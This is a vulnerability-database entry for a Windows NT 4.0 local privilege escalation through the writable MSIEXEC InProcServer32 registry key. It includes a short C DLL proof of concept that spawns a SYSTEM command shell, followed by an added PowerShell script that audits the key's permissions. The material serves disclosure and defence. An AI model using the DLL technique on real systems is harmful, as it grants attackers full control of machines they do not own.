Microsoft Windows NT 4.0 – MSIEXEC Registry Permissions

Vulnerability ID 1053469 Vulnerability type
Published 2000-10-23 Updated 2000-10-23
CVE ID N/A
CNNVD-ID N/A
Platform Windows CVSS score N/A
|Vulnerability source
https://www.exploit-db.com/exploits/20317
|Vulnerability details
Vulnerability details have not yet been disclosed.
|Vulnerability EXP
source: http://www.securityfocus.com/bid/1835/info

Due to weak permission settings for the registry key that handles the Microsoft Installer Service (MSIEXEC), it is possible for a local user on Windows NT to escalate their privilege level. 

The file extension associated with the Microsoft Installer Service is *.msi. Once a *.msi file is executed, the DLL specified under the following registry key is read:

HKLM\Software\Classes\CLSID\{000C103E-0000-0000-C000-000000000046}\InProcServer32

By default, it is C:\winnt\system32\msi.dll. Any user who is able to log on locally to the system may modify the value of the registry key. A malicious user can gain full control over the system by creating their own DLL that exports the function DllGetClassObject() and pointing the registry key to that specially crafted DLL rather than msi.dll.

The following code, compiled into a DLL, provides an interactive command shell with SYSTEM privileges when a user executes an MSI file:

#include <stdio.h>
#include <stdlib.h>   /* system() */

/* Exported under the name the Installer service resolves in the DLL it loads. */
__declspec(dllexport) int DllGetClassObject()
{
    /* Runs in the security context of the process that loaded the DLL. */
    system("cmd.exe");
    return 0;
}
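An added audit script for the weakness described above, written in PowerShell and not part of the original advisory: it reports any identity outside an assumed list of administrative principals that holds write rights on the InProcServer32 key, and flags a default value that no longer resolves to the system msi.dll. The key path and CLSID are the ones named in the text; the trusted-writer list and the expected DLL location are assumptions.

```powershell
# Added audit example; not code from the original advisory. Assumptions:
# Windows PowerShell with the Registry provider, and that only the identities
# in $TrustedWriters should be able to change this key.
$KeyPath     = 'HKLM:\SOFTWARE\Classes\CLSID\{000C103E-0000-0000-C000-000000000046}\InProcServer32'
$ExpectedDll = Join-Path $env:SystemRoot 'System32\msi.dll'

# Rights that allow the DLL path to be changed, or the key's ACL to be rewritten.
$WriteRights = [System.Security.AccessControl.RegistryRights]::SetValue -bor
               [System.Security.AccessControl.RegistryRights]::CreateSubKey -bor
               [System.Security.AccessControl.RegistryRights]::Delete -bor
               [System.Security.AccessControl.RegistryRights]::ChangePermissions -bor
               [System.Security.AccessControl.RegistryRights]::TakeOwnership -bor
               [System.Security.AccessControl.RegistryRights]::FullControl

# Identities expected to hold write access on an HKLM class registration (assumed list).
$TrustedWriters = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators', 'NT SERVICE\TrustedInstaller')

function Test-MsiInProcServerKey {
    $findings = @()

    # 1. Has the default value been redirected away from the system msi.dll?
    $current  = (Get-Item -Path $KeyPath).GetValue('')
    $expanded = [Environment]::ExpandEnvironmentVariables([string]$current)
    if ($expanded -ne $ExpectedDll) {
        $findings += "InProcServer32 default is '$current'; expected '$ExpectedDll'"
    }

    # 2. Does any identity outside the trusted list hold write rights on the key?
    foreach ($ace in (Get-Acl -Path $KeyPath).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ([int]($ace.RegistryRights -band $WriteRights) -eq 0) { continue }
        if ($TrustedWriters -contains $ace.IdentityReference.Value) { continue }
        $findings += "$($ace.IdentityReference.Value) can modify the key ($($ace.RegistryRights))"
    }
    return ,$findings
}

$result = Test-MsiInProcServerKey
if ($result.Count -eq 0) {
    Write-Output "OK: $KeyPath is writable only by trusted identities and points at msi.dll"
} else {
    $result | ForEach-Object { Write-Output "FINDING: $_" }
}
```

A finding from the ACL loop is the condition the advisory describes; the remediation is to remove the write rights from non-administrative identities on the key rather than to rely on the default value alone.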
